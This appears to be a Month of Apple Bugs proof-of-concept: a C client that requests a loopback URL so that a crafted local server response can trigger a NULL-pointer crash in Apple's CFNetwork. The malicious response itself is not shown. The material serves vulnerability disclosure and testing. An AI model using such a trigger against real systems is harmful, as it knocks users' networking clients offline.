Month of Apple Bugs - C exploit that demonstrates how CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition.
3199da9edd031aaa3b4b089d6910159ef30dde29e74ba47226c79241f26f3d3f
// gcc MOAB-25-01-2007.c -o cfnet-http -framework Carbon
#import <CoreFoundation/CoreFoundation.h>
#import <Carbon/Carbon.h>
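/*
 * Test client for the CFNetwork HTTP response handling defect described in
 * the advisory text: it issues one HTTP GET through CoreFoundation's URL
 * loading API and prints whatever body comes back.
 *
 * The target is a fixed loopback URL, so the response is produced by a test
 * server on the same machine. Per the advisory, affected CFNetwork builds
 * dereference a NULL pointer in _CFNetConnectionWillEnqueueRequests() while
 * handling certain responses; on such a system the process is expected to
 * crash inside the load call below instead of returning.
 *
 * Returns 0 when the load succeeded, 1 when the URL could not be created or
 * the load reported failure.
 */
int main() {
    SInt32 ret_code = 0;
    /* Initialised so the NULL check below is meaningful even if the load
     * call fails without writing to the out-parameter. */
    CFDataRef myData = NULL;
    /* CFSTR() yields a constant string that this code does not own, so it
     * is never passed to CFRelease(). */
    CFStringRef url = CFSTR("http://localhost:8080/index.html");

    printf("Requesting URL\n");

    CFURLRef myURL = CFURLCreateWithString(kCFAllocatorDefault, url, NULL);
    if (myURL == NULL) {
        /* CFRelease(NULL) and a load on a NULL URL would both fault in the
         * client itself, which would mask the framework behaviour under test. */
        fprintf(stderr, "Could not create URL\n");
        return 1;
    }

    /* Synchronous load; on an affected system the fault happens in here. */
    Boolean loaded = CFURLCreateDataAndPropertiesFromResource(
        kCFAllocatorDefault, myURL, &myData, NULL, NULL, &ret_code);

    if (!loaded) {
        fprintf(stderr, "Request failed (error code %d)\n", (int)ret_code);
    }

    if (myData != NULL) {
        /* CFData is a length-counted byte buffer with no NUL terminator, so
         * printing it with "%s" reads past the end of the allocation. Write
         * exactly CFDataGetLength() bytes instead. */
        const UInt8 *bytes = CFDataGetBytePtr(myData);
        CFIndex length = CFDataGetLength(myData);

        printf("Data: ");
        if (bytes != NULL && length > 0) {
            fwrite(bytes, 1, (size_t)length, stdout);
        }
        printf("\n");

        /* Returned under the Create rule: the caller owns it. */
        CFRelease(myData);
    }

    CFRelease(myURL);
    return loaded ? 0 : 1;
}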